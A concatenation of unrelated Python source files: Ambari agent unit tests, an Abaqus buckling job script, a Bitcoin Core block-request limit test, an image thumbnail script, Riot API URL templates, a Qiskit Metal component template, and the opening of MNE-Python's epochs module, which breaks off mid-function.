self.assertTrue(addHandler_mock.called)
setLevel_mock.assert_called_with(logging.INFO)
addHandler_mock.reset_mock()
setLevel_mock.reset_mock()
# Testing verbose mode
main.setup_logging(True)
self.assertTrue(addHandler_mock.called)
setLevel_mock.assert_called_with(logging.DEBUG)
@patch.object(main.logger, "setLevel")
@patch("logging.basicConfig")
def test_update_log_level(self, basicConfig_mock, setLevel_mock):
config = AmbariConfig().getConfig()
# Testing with default setup (config file does not contain loglevel entry)
# Log level should not be changed
main.update_log_level(config)
self.assertFalse(setLevel_mock.called)
setLevel_mock.reset_mock()
# Testing debug mode
config.set('agent', 'loglevel', 'DEBUG')
main.update_log_level(config)
setLevel_mock.assert_called_with(logging.DEBUG)
setLevel_mock.reset_mock()
# Testing any other mode
config.set('agent', 'loglevel', 'INFO')
main.update_log_level(config)
setLevel_mock.assert_called_with(logging.INFO)
setLevel_mock.reset_mock()
config.set('agent', 'loglevel', 'WRONG')
main.update_log_level(config)
setLevel_mock.assert_called_with(logging.INFO)
@patch("signal.signal")
def test_bind_signal_handlers(self, signal_mock):
main.bind_signal_handlers()
# Check if on SIGINT/SIGTERM agent is configured to terminate
signal_mock.assert_any_call(signal.SIGINT, main.signal_handler)
signal_mock.assert_any_call(signal.SIGTERM, main.signal_handler)
# Check if on SIGUSR1 agent is configured to fall into debug
signal_mock.assert_any_call(signal.SIGUSR1, main.debug)
@patch("os.path.exists")
@patch("ConfigParser.RawConfigParser.read")
def test_resolve_ambari_config(self, read_mock, exists_mock):
# Trying case if conf file exists
exists_mock.return_value = True
main.resolve_ambari_config()
self.assertTrue(read_mock.called)
exists_mock.reset_mock()
read_mock.reset_mock()
# Trying case if conf file does not exist
exists_mock.return_value = False
main.resolve_ambari_config()
self.assertFalse(read_mock.called)
@patch("sys.exit")
@patch("os.path.isfile")
@patch("os.path.isdir")
@patch("hostname.hostname")
def test_perform_prestart_checks(self, hostname_mock, isdir_mock, isfile_mock, exit_mock):
main.config = AmbariConfig().getConfig()
# Check expected hostname test
hostname_mock.return_value = "test.hst"
main.perform_prestart_checks("another.hst")
self.assertTrue(exit_mock.called)
exit_mock.reset_mock()
# Trying case if there is another instance running
isfile_mock.return_value = True
isdir_mock.return_value = True
main.perform_prestart_checks(None)
self.assertTrue(exit_mock.called)
isfile_mock.reset_mock()
isdir_mock.reset_mock()
exit_mock.reset_mock()
# Trying case if agent prefix dir does not exist
isfile_mock.return_value = False
isdir_mock.return_value = False
main.perform_prestart_checks(None)
self.assertTrue(exit_mock.called)
isfile_mock.reset_mock()
isdir_mock.reset_mock()
exit_mock.reset_mock()
# Trying normal case
isfile_mock.return_value = False
isdir_mock.return_value = True
main.perform_prestart_checks(None)
self.assertFalse(exit_mock.called)
@patch("time.sleep")
@patch("os.kill")
@patch("os._exit")
@patch("os.path.exists")
def test_daemonize_and_stop(self, exists_mock, _exit_mock, kill_mock, sleep_mock):
oldpid = ProcessHelper.pidfile
pid = str(os.getpid())
_, tmpoutfile = tempfile.mkstemp()
ProcessHelper.pidfile = tmpoutfile
# Test daemonization
main.daemonize()
saved = open(ProcessHelper.pidfile, 'r').read()
self.assertEqual(pid, saved)
# Reuse pid file when testing agent stop
# Testing normal exit
exists_mock.return_value = False
main.stop_agent()
kill_mock.assert_called_with(int(pid), signal.SIGTERM)
_exit_mock.assert_called_with(0)
# Restore
kill_mock.reset_mock()
_exit_mock.reset_mock()
# Testing exit when failed to remove pid file
exists_mock.return_value = True
main.stop_agent()
kill_mock.assert_any_call(int(pid), signal.SIGTERM)
kill_mock.assert_any_call(int(pid), signal.SIGKILL)
_exit_mock.assert_called_with(1)
# Restore
ProcessHelper.pidfile = oldpid
os.remove(tmpoutfile)
@patch.object(main, "setup_logging")
@patch.object(main, "bind_signal_handlers")
@patch.object(main, "stop_agent")
@patch.object(main, "resolve_ambari_config")
@patch.object(main, "perform_prestart_checks")
@patch.object(main, "daemonize")
@patch.object(main, "update_log_level")
@patch.object(NetUtil.NetUtil, "try_to_connect")
@patch.object(Controller, "__init__")
@patch.object(Controller, "start")
@patch.object(Controller, "join")
@patch("optparse.OptionParser.parse_args")
@patch.object(DataCleaner,"start")
@patch.object(DataCleaner,"__init__")
@patch.object(PingPortListener,"start")
@patch.object(PingPortListener,"__init__")
def test_main(self, ping_port_init_mock, ping_port_start_mock, data_clean_init_mock,data_clean_start_mock,
parse_args_mock, join_mock, start_mock, Controller_init_mock, try_to_connect_mock,
update_log_level_mock, daemonize_mock, perform_prestart_checks_mock,
resolve_ambari_config_mock, stop_mock, bind_signal_handlers_mock, setup_logging_mock):
data_clean_init_mock.return_value = None
Controller_init_mock.return_value = None
ping_port_init_mock.return_value = None
options = MagicMock()
parse_args_mock.return_value = (options, MagicMock)
#testing call without command-line arguments
main.main()
self.assertTrue(setup_logging_mock.called)
self.assertTrue(bind_signal_handlers_mock.called)
self.assertTrue(stop_mock.called)
self.assertTrue(resolve_ambari_config_mock.called)
self.assertTrue(perform_prestart_checks_mock.called)
self.assertTrue(daemonize_mock.called)
self.assertTrue(update_log_level_mock.called)
try_to_connect_mock.assert_called_once_with(ANY, -1, ANY)
self.assertTrue(start_mock.called)
self.assertTrue(data_clean_init_mock.called)
self.assertTrue(data_clean_start_mock.called)
self.assertTrue(ping_port_init_mock.called)
self.assertTrue(ping_port_start_mock.called)
perform_prestart_checks_mock.reset_mock()
# Testing call with --expected-hostname parameter
options.expected_hostname = "test.hst"
main.main()
perform_prestart_checks_mock.assert_called_once_with(options.expected_hostname)
|
#=====================================================================#
#
# Created by M.A. Bessa on 12-Nov-2019 03:54:04
#=====================================================================#
from abaqusConstants import *
from odbAccess import *
import os
import numpy
import collections
#
os.chdir(r'/home/gkus/F3DAS-master/3_Analyses/DOE_Ix-PD-100/Input_point1/Imperfection_point1/DoE_point57')
with open('DoE57_linear_buckle.inp','w') as File:
File.write('** Include file with mesh of structure:\n')
File.write('*INCLUDE, INPUT=include_mesh_DoE57.inp\n')
File.write('** \n')
File.write('** STEP: Step-1\n')
File.write('** \n')
File.write('*Step, name=Step-1\n')
File.write('*Buckle, eigensolver=lanczos\n')
File.write('20, 0., , , \n')
File.write('** \n')
File.write('** BOUNDARY CONDITIONS\n')
File.write('** \n')
File.write('** Name: BC_Zminus Type: Displacement/Rotation\n')
File.write('*Boundary\n')
File.write('RP_ZmYmXm, 1, 6\n')
File.write('** \n')
File.write('** LOADS\n')
File.write('** \n')
File.write('** Name: Applied_Moment Type: Moment\n')
File.write('*Cload\n')
File.write('RP_ZpYmXm, 3, -1.00\n')
File.write('** \n')
File.write('*Node File\n')
File.write('U \n')
File.write('** \n')
File.write('*EL PRINT,FREQUENCY=1\n')
File.write('*NODE PRINT,FREQUENCY=1\n')
File.write('*MODAL FILE\n')
File.write('*OUTPUT,FIELD,VAR=PRESELECT\n')
File.write('*OUTPUT,HISTORY,FREQUENCY=1\n')
File.write('*MODAL OUTPUT\n')
File.write('*End Step\n')
# Create job, run it and wait for completion
inputFile_string = '/home/gkus/F3DAS-master/3_Analyses/DOE_Ix-PD-100/Input_point1/Imperfection_point1/DoE_point57'+'/'+'DoE57_linear_buckle.inp'
job=mdb.JobFromInputFile(name='DoE57_linear_buckle', inputFileName=inputFile_string,
type=ANALYSIS, atTime=None, waitMinutes=0, waitHours=0, queue=None,
memory=90, memoryUnits=PERCENTAGE, getMemoryFromAnalysis=True,
explicitPrecision=SINGLE, nodalOutputPrecision=SINGLE, userSubroutine='',
scratch='', resultsFormat=ODB, parallelizationMethodExplicit=DOMAIN,
numDomains=1, activateLoadBalancing=False, multiprocessingMode=DEFAULT,
numCpus=1)
#
job.submit()
job.waitForCompletion()
#
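# Hedged sketch (not part of the original script): after the job completes, the
# buckling eigenvalues could be read back from the ODB frame descriptions via the
# already-imported odbAccess module. File and step names assume the job above.
# odb = openOdb('DoE57_linear_buckle.odb')
# for frame in odb.steps['Step-1'].frames[1:]:
#     print(frame.description)  # e.g. 'Mode 1: EigenValue = ...'
# odb.close()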
|
#!/usr/bin/env python2
# Copyright (c) 2015 The Bitcoin Core developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
from test_framework.mininode import *
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
import logging
'''
In this test we connect to one node over p2p, send it numerous inv's, and
compare the resulting number of getdata requests to a max allowed value. We
test for exceeding 128 blocks in flight, which was the limit a 0.9 client would
reach. [0.10 clients shouldn't request more than 16 from a single peer.]
'''
MAX_REQUESTS = 128
class TestManager(NodeConnCB):
# set up NodeConnCB callbacks, overriding base class
def on_getdata(self, conn, message):
self.log.debug("got getdata %s" % repr(message))
# Log the requests
for inv in message.inv:
if inv.hash not in self.blockReqCounts:
self.blockReqCounts[inv.hash] = 0
self.blockReqCounts[inv.hash] += 1
def on_close(self, conn):
if not self.disconnectOkay:
raise EarlyDisconnectError(0)
def __init__(self):
NodeConnCB.__init__(self)
self.log = logging.getLogger("BlockRelayTest")
def add_new_connection(self, connection):
self.connection = connection
self.blockReqCounts = {}
self.disconnectOkay = False
def run(self):
try:
fail = False
self.connection.rpc.generate(1) # Leave IBD
numBlocksToGenerate = [ 8, 16, 128, 1024 ]
for count in range(len(numBlocksToGenerate)):
current_invs = []
for i in range(numBlocksToGenerate[count]):
current_invs.append(CInv(2, random.randrange(0, 1<<256)))
if len(current_invs) >= 50000:
self.connection.send_message(msg_inv(current_invs))
current_invs = []
if len(current_invs) > 0:
self.connection.send_message(msg_inv(current_invs))
# Wait and see how many blocks were requested
time.sleep(2)
total_requests = 0
with mininode_lock:
for key in self.blockReqCounts:
total_requests += self.blockReqCounts[key]
if self.blockReqCounts[key] > 1:
raise AssertionError("Error, test failed: block %064x requested more than once" % key)
if total_requests > MAX_REQUESTS:
raise AssertionError("Error, too many blocks (%d) requested" % total_requests)
print "Round %d: success (total requests: %d)" % (count, total_requests)
except AssertionError as e:
print "TEST FAILED: ", e.args
self.disconnectOkay = True
self.connection.disconnect_node()
class MaxBlocksInFlightTest(BitcoinTestFramework):
def add_options(self, parser):
parser.add_option("--testbinary", dest="testbinary",
default=os.getenv("BITCOIND", "bitcoind"),
help="Binary to test max block requests behavior")
def setup_chain(self):
print "Initializing test directory "+self.options.tmpdir
initialize_chain_clean(self.options.tmpdir, 1)
def setup_network(self):
self.nodes = start_nodes(1, self.options.tmpdir,
extra_args=[['-debug', '-whitelist=127.0.0.1']],
binary=[self.options.testbinary])
def run_test(self):
test = TestManager()
test.add_new_connection(NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], test))
NetworkThread().start() # Start up network handling in another thread
test.run()
if __name__ == '__main__':
MaxBlocksInFlightTest().main()
|
import os
import time
from PIL import Image, ImageFilter
directory = "images"
image_files = os.listdir(directory)
dir_save = "thumbnails"
os.makedirs(dir_save, exist_ok=True)  # make sure the output folder exists
t1 = time.perf_counter()
size = (1200, 1200)
for f in image_files:
    # blur each source image, shrink it to the target size and save the thumbnail
    image = Image.open(os.path.join(directory, f))
    image = image.filter(ImageFilter.GaussianBlur(radius=15))
    image.thumbnail(size)
    image.save(os.path.join(dir_save, f))
    print("{} processed.".format(f))
t2 = time.perf_counter()
print("script finished in {:.2f}(s).".format(t2 - t1))
|
"""Aprendendo a extrair dados da API da RIOT."""
# 20 requests every 1 seconds(s)
# 100 requests every 2 minutes(s)
URL = {
'base_summoner': 'https://{region}.api.riotgames.com/lol/summoner/{url}',
'base_matchlist': 'https://{region}.api.riotgames.com/lol/match/{url}',
'base_matchPerChamp': 'https://{region}.api.riotgames.com/lol/match/{url}',
'base_match': 'https://{region}.api.riotgames.com/lol/match/{url}',
'base_matchPerqueue': 'https://{region}.api.riotgames.com/lol/match/{url}',
'base_tier': 'https://{region}.api.riotgames.com/lol/league/{url}',
'summoner_by_name': 'v{version}/summoners/by-name/{vars}',
'match_list': 'v{version}/matchlists/by-account/{vars}',
'matchPerChamp': 'v{version}/matchlists/by-account/{vars}?champion={champion}',
'matchPerqueue': 'v{version}/matchlists/by-account/{vars}?queue={queue}',
'match_stats': 'v{version}/matches/{vars}',
'tier': 'v{version}/entries/by-summoner/{vars}'}
API_VERSIONS = {
'summoner': '4'
}
REGION = {
'brazil': 'br1'
}
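# A minimal sketch (not from the original file) showing how these templates could
# be combined into a full request URL; the summoner name below is illustrative and
# the API key would still have to be supplied separately (commonly as an
# 'X-Riot-Token' header - an assumption here, not defined in this module).
def build_summoner_url(summoner_name, region='brazil'):
    """Format the by-name summoner endpoint for the given region."""
    endpoint = URL['summoner_by_name'].format(
        version=API_VERSIONS['summoner'], vars=summoner_name)
    return URL['base_summoner'].format(region=REGION[region], url=endpoint)
# build_summoner_url('SomePlayer') ->
# 'https://br1.api.riotgames.com/lol/summoner/v4/summoners/by-name/SomePlayer'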
|
# -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
from qiskit_metal import draw, Dict
from qiskit_metal.qlibrary.core import QComponent
from ... import config
if not config.is_building_docs():
from qiskit_metal import is_true
class MyQComponent(QComponent):
"""
This class is a template
Use this class as a blueprint to put together for your components - have fun
"""
# Edit these to define your own template options for creation
# Default drawing options
default_options = Dict(width='500um',
height='300um',
pos_x='0um',
pos_y='0um',
rotation='0',
layer='1')
"""Default drawing options"""
# Name prefix of component, if user doesn't provide name
component_metadata = Dict(short_name='component')
"""Component metadata"""
def make(self):
"""Convert self.options into QGeometry."""
p = self.parse_options() # Parse the string options into numbers
# EDIT HERE - Replace the following with your code
# Create some raw geometry
# Use autocompletion for the `draw.` module (use tab key)
rect = draw.rectangle(p.width, p.height, p.pos_x, p.pos_y)
rect = draw.rotate(rect, p.rotation)
geom = {'my_polygon': rect}
self.add_qgeometry('poly', geom, layer=p.layer, subtract=False)
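# Hedged usage sketch (not part of the template): assuming the standard
# qiskit_metal planar-design workflow, the component could be instantiated as in
# the commented lines below; the design object and component name are illustrative.
#
#     from qiskit_metal import designs
#     design = designs.DesignPlanar()
#     comp = MyQComponent(design, 'my_component', options=dict(width='600um'))
#     comp.rebuild()  # re-run make() after changing options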
|
# -*- coding: utf-8 -*-
"""Tools for working with epoched data."""
# Authors: Alexandre Gramfort <alexandre.gramfort@inria.fr>
# Matti Hämäläinen <msh@nmr.mgh.harvard.edu>
# Daniel Strohmeier <daniel.strohmeier@tu-ilmenau.de>
# Denis Engemann <denis.engemann@gmail.com>
# Mainak Jas <mainak@neuro.hut.fi>
# Stefan Appelhoff <stefan.appelhoff@mailbox.org>
#
# License: BSD-3-Clause
from functools import partial
from collections import Counter
from copy import deepcopy
import json
import operator
import os.path as op
import numpy as np
from .io.utils import _construct_bids_filename
from .io.write import (start_and_end_file, start_block, end_block,
write_int, write_float, write_float_matrix,
write_double_matrix, write_complex_float_matrix,
write_complex_double_matrix, write_id, write_string,
_get_split_size, _NEXT_FILE_BUFFER, INT32_MAX)
from .io.meas_info import (read_meas_info, write_meas_info, _merge_info,
_ensure_infos_match)
from .io.open import fiff_open, _get_next_fname
from .io.tree import dir_tree_find
from .io.tag import read_tag, read_tag_info
from .io.constants import FIFF
from .io.fiff.raw import _get_fname_rep
from .io.pick import (channel_indices_by_type, channel_type,
pick_channels, pick_info, _pick_data_channels,
_DATA_CH_TYPES_SPLIT, _picks_to_idx)
from .io.proj import setup_proj, ProjMixin
from .io.base import BaseRaw, TimeMixin, _get_ch_factors
from .bem import _check_origin
from .evoked import EvokedArray, _check_decim
from .baseline import rescale, _log_rescale, _check_baseline
from .channels.channels import (ContainsMixin, UpdateChannelsMixin,
SetChannelsMixin, InterpolationMixin)
from .filter import detrend, FilterMixin, _check_fun
from .parallel import parallel_func
from .event import (_read_events_fif, make_fixed_length_events,
match_event_names)
from .fixes import rng_uniform
from .viz import (plot_epochs, plot_epochs_psd, plot_epochs_psd_topomap,
plot_epochs_image, plot_topo_image_epochs, plot_drop_log)
from .utils import (_check_fname, check_fname, logger, verbose,
_time_mask, check_random_state, warn, _pl,
sizeof_fmt, SizeMixin, copy_function_doc_to_method_doc,
_check_pandas_installed,
_check_preload, GetEpochsMixin,
_prepare_read_metadata, _prepare_write_metadata,
_check_event_id, _gen_events, _check_option,
_check_combine, ShiftTimeMixin, _build_data_frame,
_check_pandas_index_arguments, _convert_times,
_scale_dataframe_data, _check_time_format, object_size,
_on_missing, _validate_type, _ensure_events,
_path_like, _VerboseDep)
from .utils.docs import fill_doc
from .annotations import (_write_annotations, _read_annotations_fif,
EpochAnnotationsMixin)
def _pack_reject_params(epochs):
reject_params = dict()
for key in ('reject', 'flat', 'reject_tmin', 'reject_tmax'):
val = getattr(epochs, key, None)
if val is not None:
reject_params[key] = val
return reject_params
def _save_split(epochs, fname, part_idx, n_parts, fmt, split_naming,
overwrite):
"""Split epochs.
Anything new added to this function also needs to be added to
BaseEpochs.save to account for new file sizes.
"""
# insert index in filename
base, ext = op.splitext(fname)
if part_idx > 0:
if split_naming == 'neuromag':
fname = '%s-%d%s' % (base, part_idx, ext)
else:
assert split_naming == 'bids'
fname = _construct_bids_filename(base, ext, part_idx,
validate=False)
_check_fname(fname, overwrite=overwrite)
next_fname = None
if part_idx < n_parts - 1:
if split_naming == 'neuromag':
next_fname = '%s-%d%s' % (base, part_idx + 1, ext)
else:
assert split_naming == 'bids'
next_fname = _construct_bids_filename(base, ext, part_idx + 1,
validate=False)
next_idx = part_idx + 1
else:
next_idx = None
with start_and_end_file(fname) as fid:
_save_part(fid, epochs, fmt, n_parts, next_fname, next_idx)
def _save_part(fid, epochs, fmt, n_parts, next_fname, next_idx):
info = epochs.info
meas_id = info['meas_id']
start_block(fid, FIFF.FIFFB_MEAS)
write_id(fid, FIFF.FIFF_BLOCK_ID)
if info['meas_id'] is not None:
write_id(fid, FIFF.FIFF_PARENT_BLOCK_ID, info['meas_id'])
# Write measurement info
write_meas_info(fid, info)
# One or more evoked data sets
start_block(fid, FIFF.FIFFB_PROCESSED_DATA)
start_block(fid, FIFF.FIFFB_MNE_EPOCHS)
# write events out after getting data to ensure bad events are dropped
data = epochs.get_data()
_check_option('fmt', fmt, ['single', 'double'])
if np.iscomplexobj(data):
if fmt == 'single':
write_function = write_complex_float_matrix
elif fmt == 'double':
write_function = write_complex_double_matrix
else:
if fmt == 'single':
write_function = write_float_matrix
elif fmt == 'double':
write_function = write_double_matrix
# Epoch annotations are written if there are any
annotations = getattr(epochs, 'annotations', [])
if annotations is not None and len(annotations):
_write_annotations(fid, annotations)
# write Epoch event windows
start_block(fid, FIFF.FIFFB_MNE_EVENTS)
write_int(fid, FIFF.FIFF_MNE_EVENT_LIST, epochs.events.T)
write_string(fid, FIFF.FIFF_DESCRIPTION, _event_id_string(epochs.event_id))
end_block(fid, FIFF.FIFFB_MNE_EVENTS)
# Metadata
if epochs.metadata is not None:
start_block(fid, FIFF.FIFFB_MNE_METADATA)
metadata = _prepare_write_metadata(epochs.metadata)
write_string(fid, FIFF.FIFF_DESCRIPTION, metadata)
end_block(fid, FIFF.FIFFB_MNE_METADATA)
# First and last sample
first = int(round(epochs.tmin * info['sfreq'])) # round just to be safe
last = first + len(epochs.times) - 1
write_int(fid, FIFF.FIFF_FIRST_SAMPLE, first)
write_int(fid, FIFF.FIFF_LAST_SAMPLE, last)
# write raw original sampling rate
write_float(fid, FIFF.FIFF_MNE_EPOCHS_RAW_SFREQ, epochs._raw_sfreq)
# save baseline
if epochs.baseline is not None:
bmin, bmax = epochs.baseline
write_float(fid, FIFF.FIFF_MNE_BASELINE_MIN, bmin)
write_float(fid, FIFF.FIFF_MNE_BASELINE_MAX, bmax)
# The epochs itself
decal = np.empty(info['nchan'])
for k in range(info['nchan']):
decal[k] = 1.0 / (info['chs'][k]['cal'] *
info['chs'][k].get('scale', 1.0))
data *= decal[np.newaxis, :, np.newaxis]
write_function(fid, FIFF.FIFF_EPOCH, data)
# undo modifications to data
data /= decal[np.newaxis, :, np.newaxis]
write_string(fid, FIFF.FIFF_MNE_EPOCHS_DROP_LOG,
json.dumps(epochs.drop_log))
reject_params = _pack_reject_params(epochs)
if reject_params:
write_string(fid, FIFF.FIFF_MNE_EPOCHS_REJECT_FLAT,
json.dumps(reject_params))
write_int(fid, FIFF.FIFF_MNE_EPOCHS_SELECTION,
epochs.selection)
# And now write the next file info in case epochs are split on disk
if next_fname is not None and n_parts > 1:
start_block(fid, FIFF.FIFFB_REF)
write_int(fid, FIFF.FIFF_REF_ROLE, FIFF.FIFFV_ROLE_NEXT_FILE)
write_string(fid, FIFF.FIFF_REF_FILE_NAME, op.basename(next_fname))
if meas_id is not None:
write_id(fid, FIFF.FIFF_REF_FILE_ID, meas_id)
write_int(fid, FIFF.FIFF_REF_FILE_NUM, next_idx)
end_block(fid, FIFF.FIFFB_REF)
end_block(fid, FIFF.FIFFB_MNE_EPOCHS)
end_block(fid, FIFF.FIFFB_PROCESSED_DATA)
end_block(fid, FIFF.FIFFB_MEAS)
def _event_id_string(event_id):
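    # e.g. (illustrative values): {'auditory': 1, 'visual': 3} -> 'auditory:1;visual:3'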
return ';'.join([k + ':' + str(v) for k, v in event_id.items()])
def _merge_events(events, event_id, selection):
"""Merge repeated events."""
event_id = event_id.copy()
new_events = events.copy()
event_idxs_to_delete = list()
unique_events, counts = np.unique(events[:, 0], return_counts=True)
for ev in unique_events[counts > 1]:
# indices at which the non-unique events happened
idxs = (events[:, 0] == ev).nonzero()[0]
# Figure out new value for events[:, 1]. Set to 0, if mixed vals exist
unique_priors = np.unique(events[idxs, 1])
new_prior = unique_priors[0] if len(unique_priors) == 1 else 0
# If duplicate time samples have same event val, "merge" == "drop"
# and no new event_id key will be created
ev_vals = np.unique(events[idxs, 2])
if len(ev_vals) <= 1:
new_event_val = ev_vals[0]
# Else, make a new event_id for the merged event
else:
# Find all event_id keys involved in duplicated events. These
# keys will be merged to become a new entry in "event_id"
event_id_keys = list(event_id.keys())
event_id_vals = list(event_id.values())
new_key_comps = [event_id_keys[event_id_vals.index(value)]
for value in ev_vals]
# Check if we already have an entry for merged keys of duplicate
# events ... if yes, reuse it
for key in event_id:
if set(key.split('/')) == set(new_key_comps):
new_event_val = event_id[key]
break
# Else, find an unused value for the new key and make an entry into
# the event_id dict
else:
ev_vals = np.unique(
np.concatenate((list(event_id.values()),
events[:, 1:].flatten()),
axis=0))
if ev_vals[0] > 1:
new_event_val = 1
else:
diffs = np.diff(ev_vals)
idx = np.where(diffs > 1)[0]
idx = -1 if len(idx) == 0 else idx[0]
new_event_val = ev_vals[idx] + 1
new_event_id_key = '/'.join(sorted(new_key_comps))
event_id[new_event_id_key] = int(new_event_val)
# Replace duplicate event times with merged event and remember which
# duplicate indices to delete later
new_events[idxs[0], 1] = new_prior
new_events[idxs[0], 2] = new_event_val
event_idxs_to_delete.extend(idxs[1:])
# Delete duplicate event idxs
new_events = np.delete(new_events, event_idxs_to_delete, 0)
new_selection = np.delete(selection, event_idxs_to_delete, 0)
return new_events, event_id, new_selection
def _handle_event_repeated(events, event_id, event_repeated, selection,
drop_log):
"""Handle repeated events.
Note that drop_log will be modified inplace
"""
assert len(events) == len(selection)
selection = np.asarray(selection)
unique_events, u_ev_idxs = np.unique(events[:, 0], return_index=True)
# Return early if no duplicates
if len(unique_events) == len(events):
return events, event_id, selection, drop_log
# Else, we have duplicates. Triage ...
_check_option('event_repeated', event_repeated, ['error', 'drop', 'merge'])
drop_log = list(drop_log)
if event_repeated == 'error':
raise RuntimeError('Event time samples were not unique. Consider '
'setting the `event_repeated` parameter.')
elif event_repeated == 'drop':
logger.info('Multiple event values for single event times found. '
'Keeping the first occurrence and dropping all others.')
new_events = events[u_ev_idxs]
new_selection = selection[u_ev_idxs]
drop_ev_idxs = np.setdiff1d(selection, new_selection)
for idx in drop_ev_idxs:
drop_log[idx] = drop_log[idx] + ('DROP DUPLICATE',)
selection = new_selection
elif event_repeated == 'merge':
logger.info('Multiple event values for single event times found. '
'Creating new event value to reflect simultaneous events.')
new_events, event_id, new_selection = \
_merge_events(events, event_id, selection)
drop_ev_idxs = np.setdiff1d(selection, new_selection)
for idx in drop_ev_idxs:
drop_log[idx] = drop_log[idx] + ('MERGE DUPLICATE',)
selection = new_selection
drop_log = tuple(drop_log)
# Remove obsolete kv-pairs from event_id after handling
keys = new_events[:, 1:].flatten()
event_id = {k: v for k, v in event_id.items() if v in keys}
return new_events, event_id, selection, drop_log
@fill_doc
class BaseEpochs(ProjMixin, ContainsMixin, UpdateChannelsMixin, ShiftTimeMixin,
SetChannelsMixin, InterpolationMixin, FilterMixin,
TimeMixin, SizeMixin, GetEpochsMixin, EpochAnnotationsMixin,
_VerboseDep):
"""Abstract base class for `~mne.Epochs`-type classes.
.. warning:: This class provides basic functionality and should never be
instantiated directly.
Parameters
----------
%(info_not_none)s
data : ndarray | None
If ``None``, data will be read from the Raw object. If ndarray, must be
of shape (n_epochs, n_channels, n_times).
%(events_epochs)s
%(event_id)s
%(epochs_tmin_tmax)s
%(baseline_epochs)s
Defaults to ``(None, 0)``, i.e. beginning of the data until
time point zero.
%(epochs_raw)s
%(picks_all)s
%(reject_epochs)s
%(flat)s
%(decim)s
%(epochs_reject_tmin_tmax)s
%(epochs_detrend)s
%(proj_epochs)s
%(epochs_on_missing)s
preload_at_end : bool
%(epochs_preload)s
selection : iterable | None
Iterable of indices of selected epochs. If ``None``, will be
automatically generated, corresponding to all non-zero events.
drop_log : tuple | None
Tuple of tuple of strings indicating which epochs have been marked to
be ignored.
filename : str | None
The filename (if the epochs are read from disk).
%(epochs_metadata)s
%(epochs_event_repeated)s
%(verbose)s
raw_sfreq : float
The original Raw object sampling rate. If None, then it is set to
``info['sfreq']``.
annotations : instance of mne.Annotations | None
Annotations to set.
Notes
-----
The ``BaseEpochs`` class is public to allow for stable type-checking in
user code (i.e., ``isinstance(my_epochs, BaseEpochs)``) but should not be
used as a constructor for Epochs objects (use instead :class:`mne.Epochs`).
"""
@verbose
def __init__(self, info, data, events, event_id=None,
tmin=-0.2, tmax=0.5,
baseline=(None, 0), raw=None, picks=None, reject=None,
flat=None, decim=1, reject_tmin=None, reject_tmax=None,
detrend=None, proj=True, on_missing='raise',
preload_at_end=False, selection=None, drop_log=None,
filename=None, metadata=None, event_repeated='error',
*, verbose=None, raw_sfreq=None,
annotations=None): # noqa: D102
if events is not None: # RtEpochs can have events=None
events = _ensure_events(events)
events_max = events.max()
if events_max > INT32_MAX:
raise ValueError(
f'events array values must not exceed {INT32_MAX}, '
f'got {events_max}')
event_id = _check_event_id(event_id, events)
self.event_id = event_id
del event_id
if events is not None: # RtEpochs can have events=None
for key, val in self.event_id.items():
if val not in events[:, 2]:
msg = ('No matching events found for %s '
'(event id %i)' % (key, val))
_on_missing(on_missing, msg)
# ensure metadata matches original events size
self.selection = np.arange(len(events))
self.events = events
# same as self.metadata = metadata, but suppress log in favor
# of logging below (after setting self.selection)
GetEpochsMixin.metadata.fset(self, metadata, verbose=False)
del events
values = list(self.event_id.values())
selected = np.where(np.in1d(self.events[:, 2], values))[0]
if selection is None:
selection = selected
else:
selection = np.array(selection, int)
if selection.shape != (len(selected),):
raise ValueError('selection must be shape %s got shape %s'
% (selected.shape, selection.shape))
self.selection = selection
if drop_log is None:
self.drop_log = tuple(
() if k in self.selection else ('IGNORED',)
for k in range(max(len(self.events),
max(self.selection) + 1)))
else:
self.drop_log = drop_log
self.events = self.events[selected]
self.events, self.event_id, self.selection, self.drop_log = \
_handle_event_repeated(
self.events, self.event_id, event_repeated,
self.selection, self.drop_log)
# then subselect
sub = np.where(np.in1d(selection, self.selection))[0]
if isinstance(metadata, list):
metadata = [metadata[s] for s in sub]
elif metadata is not None:
metadata = metadata.iloc[sub]
# Remove temporarily set metadata from above, and set
# again to get the correct log ("adding metadata", instead of
# "replacing existing metadata")
GetEpochsMixin.metadata.fset(self, None, verbose=False)
self.metadata = metadata
del metadata
n_events = len(self.events)
if n_events > 1:
if np.diff(self.events.astype(np.int64)[:, 0]).min() <= 0:
warn('The events passed to the Epochs constructor are not '
'chronologically ordered.', RuntimeWarning)
if n_events > 0:
logger.info('%d matching events found' % n_events)
else:
raise ValueError('No desired events found.')
else:
self.drop_log = tuple()
self.selection = np.array([], int)
self.metadata = metadata
# do not set self.events here, let subclass do it
if (detrend not in [None, 0, 1]) or isinstance(detrend, bool):
raise ValueError('detrend must be None, 0, or 1')
self.detrend = detrend
self._raw = raw
info._check_consistency()
self.picks = _picks_to_idx(info, picks, none='all', exclude=(),
allow_empty=False)
self.info = pick_info(info, self.picks)
del info
self._current = 0
if data is None:
self.preload = False
self._data = None
self._do_baseline = True
else:
assert decim == 1
if data.ndim != 3 or data.shape[2] != \
round((tmax - tmin) * self.info['sfreq']) + 1:
raise RuntimeError('bad data shape')
if data.shape[0] != len(self.events):
raise ValueError(
'The number of epochs and the number of events must match')
self.preload = True
self._data = data
self._do_baseline = False
self._offset = None
if tmin > tmax:
raise ValueError('tmin has to be less than or equal to tmax')
# Handle times
sfreq = float(self.info['sfreq'])
start_idx = int(round(tmin * sfreq))
self._raw_times = np.arange(start_idx,
int(round(tmax * sfreq)) + 1) / sfreq
self._set_times(self._raw_times)
# check reject_tmin and reject_tmax
if reject_tmin is not None:
if (np.isclose(reject_tmin, tmin)):
# adjust for potential small deviations due to sampling freq
reject_tmin = self.tmin
elif reject_tmin < tmin:
raise ValueError(f'reject_tmin needs to be None or >= tmin '
f'(got {reject_tmin})')
if reject_tmax is not None:
if (np.isclose(reject_tmax, tmax)):
# adjust for potential small deviations due to sampling freq
